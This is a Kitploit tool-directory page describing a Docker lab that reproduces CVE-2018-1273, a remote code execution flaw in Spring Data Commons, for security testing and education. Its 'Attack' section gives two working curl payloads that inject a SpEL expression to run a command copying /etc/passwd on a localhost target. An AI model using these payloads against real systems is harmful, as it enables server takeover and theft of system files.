Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-1273 — Reproducible Docker environment for CVE-2018-1273, demonstrating RCE in Spring Data Commons via crafted HTTP requests for security testing and education. | Kitploit
Tools/GitHubGitHub/knqyf263/cve-2018-1273
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubknqyf263/cve-2018-1273

CVE-2018-1273

Reproducible Docker environment for CVE-2018-1273, demonstrating RCE in Spring Data Commons via crafted HTTP requests for security testing and education.

View Repository
1028 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-1273

Environment for CVE-2018-1273

CVE-2018-1273: RCE with Spring Data Commons
https://pivotal.io/security/cve-2018-1273

Application

https://github.com/spring-projects/spring-data-examples/tree/master/web/example

Build

root@kitploit:~
$ docker build -t cve-2018-1273 .

Run

root@kitploit:~
$ docker run -d -p 8080:8080 cve-2018-1273 

Web

http://localhost:8080/users/

Attack

root@kitploit:~
$ curl -v -d 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("cp /etc/passwd /tmp")]=test' 'http://localhost:8080/users/' 

or

root@kitploit:~
$ curl -v -d 'username[T(java.lang.Runtime).getRuntime().exec("cp+/etc/passwd+/tmp")]=test' 'http://localhost:8080/users/' 
Download Tool